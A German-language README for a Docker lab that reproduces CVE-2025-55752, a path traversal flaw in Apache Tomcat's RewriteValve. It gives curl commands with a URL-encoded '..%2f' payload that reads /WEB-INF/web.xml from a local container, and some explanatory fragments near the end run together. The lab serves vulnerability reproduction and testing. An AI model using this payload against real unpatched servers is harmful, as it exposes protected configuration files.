
# Docker-basierte Reproduktionsumgebung für CVE-2025-55752, eine Path-Traversal-Schwachstelle in Apache Tomcats RewriteValve, die den Normalize-vor-Decode-Fehler demonstriert und Testbefehle bereitstellt.
Docker-basierte Reproduktionsumgebung für CVE-2025-55752, eine Path-Traversal-Schwachstelle in Apache Tomcat 10.1.44.
CVE-2025-55752 ist eine Path-Traversal-Schwachstelle im RewriteValve von Apache Tomcat, die durch eine falsche Verarbeitungsreihenfolge verursacht wird: Die URL-Normalisierung erfolgt vor der URL-Dekodierung. Dies ermöglicht Angreifern, Sicherheitsbeschränkungen für Verzeichnisse wie /WEB-INF/ mithilfe von URL-kodierten Path-Traversal-Sequenzen (..%2f) zu umgehen.
| Serie | Verwundbare Versionen | Gepatchte Version |
|---|
| 11.x | 11.0.0-M1 bis 11.0.10 | 11.0.11+ |
| 10.1.x | 10.1.0-M1 bis 10.1.44 | 10.1.45+ |
| 9.0.x | 9.0.0-M11 bis 9.0.108 | 9.0.109+ |
| 8.5.x | 8.5.6 bis 8.5.100 | EOL - Kein Patch |
git clone https://github.com/masahiro331/CVE-2025-55752.git
cd CVE-2025-55752
docker-compose up -d
curl http://localhost:8080/
curl -I 'http://localhost:8080/WEB-INF/web.xml'
Erwartet: 403 Forbidden
curl -s 'http://localhost:8080/download?path=..%2fWEB-INF%2fweb.xml' | head -5
curl -I 'http://localhost:8080/download?path=..%2fWEB-INF%2fweb.xml'
Erwartet: 200 OK + web.xml-Inhalt (Schwachstelle bestätigt)
/download?path=..%2fWEB-INF%2fweb.xml/files/..%2fWEB-INF%2fweb.xml%2f wird nicht als / erkannt, .. bleibt erhalten%2f → / → /files/../WEB-INF/web.xml/WEB-INF/web.xmlKorrekt: Dekodieren → Normalisieren → Sicherheitsprüfung
Verwundbar: Normalisieren → Dekodieren → Sicherheitsprüfung ✗
../ und %2e%2e⚠️ WARNUNG: Nicht in der Produktion einsetzen. Nur in isolierten Testumgebungen verwenden.